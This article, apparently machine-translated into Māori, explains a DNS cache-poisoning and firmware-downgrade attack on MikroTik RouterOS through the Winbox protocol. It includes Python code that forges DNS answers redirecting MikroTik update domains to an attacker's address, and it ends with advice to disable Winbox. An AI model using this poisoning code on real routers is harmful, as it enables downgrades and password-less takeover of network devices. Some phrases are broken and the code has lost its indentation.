Ko te kaha ki te whakaheke i nga taputapu i runga i te RouterOS (Mikrotik) ka raru nga rau mano o nga taputapu whatunga. Ko te whakaraeraetanga e pa ana ki te paihana o te keteroki DNS o te kawa Winbox ka taea e koe te uta i nga mea tawhito (me te tautuhi kupuhipa taunoa) kua whakarerekehia ranei te firmware ki runga i te taputapu.
Nga korero whakaraerae
Ka tautoko te tauranga RouterOS i te whakahau whakatau mo te rapu DNS.
Ka whakahaeretia tenei tono e te rua e kiia nei ko te solver. Ko te Resolver tetahi o nga tini takirua e hono ana ki te kawa Winbox a RouterOS. I te taumata teitei, ka tukuna nga "karere" ki te tauranga Winbox ki nga momo rua i RouterOS i runga i te kaupapa tatau-a-raupapa.
Ma te taunoa, kua monokia te ahuatanga tūmau DNS a RouterOS.
Heoi, ahakoa ka monokia te mahi tūmau, ka mau tonu te pouara i tana ake keteroki DNS.
Ina tono tatou ma te whakamahi winbox_dns_request hei tauira tauira.com, ka huna e te pouara te hua.
I te mea ka taea e taatau te tautuhi i te tūmau DNS e haere ai te tono, he iti noa te whakauru i nga wahitau hē. Hei tauira, ka taea e koe te whirihora i te whakatinanatanga tūmau DNS mai i ki te whakautu i nga wa katoa me te rekoata A kei roto te wahitau IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Inaianei kei te rapu koe mo te tauira.com ma te whakamahi i te Winbox, ka kite koe kua paihana te keteroki DNS o te pouara.
Ae ra, ko te poisoning example.com ehara i te mea tino whai hua mai i te mea kaore e whakamahia e te pouara. Heoi, me uru te pouara ki upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com me download.mikrotik.com. Na te mihi ki tetahi atu he, ka taea te paihana i a raatau katoa i te wa kotahi.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Ka tono te pouara kia kotahi te whakaaetanga, ka whakahokia e matou e rima. Karekau te pouara e keteroki tika i enei whakautu katoa.
Ma te mohio, he pai ano tenei whakaeke mena kei te mahi te pouara hei tūmau DNS, na te mea ka taea e nga kaihoko o te pouara te whakaeke.
Ma tenei whakaeke ka taea e koe te whakamahi i te whakaraeraetanga kino ake: te whakaheke, te whakahoki ranei i te putanga o RouterOS. Ka hanga ano e te kaitukino te arorau o te tūmau whakahou, tae atu ki te changelog, me te akiaki i a RouterOS ki te kite i te putanga tawhito (whakaraerae) he mea o naianei. Ko te kino kei konei kei te "whakahou" te putanga, ka tautuhia te kupuhipa a te kaiwhakahaere ki te uara taunoa - ka taea e te kaiwhaiwhai te whakauru ki te punaha me te kupuhipa kore!
Kei te tino mahi te whakaeke, ahakoa te mea ka whakatinana i etahi atu vectors, tae atu ki era e pa ana ki , engari he tikanga kore noa tenei me te whakamahi mo nga kaupapa ture kore he ture.
tiaki
Ma te whakakore noa i te Winbox ka taea e koe te tiaki i a koe mai i enei whakaeke. Ahakoa te pai o te whakahaere ma te Winbox, he pai ake te whakamahi i te kawa SSH.
Source: will.com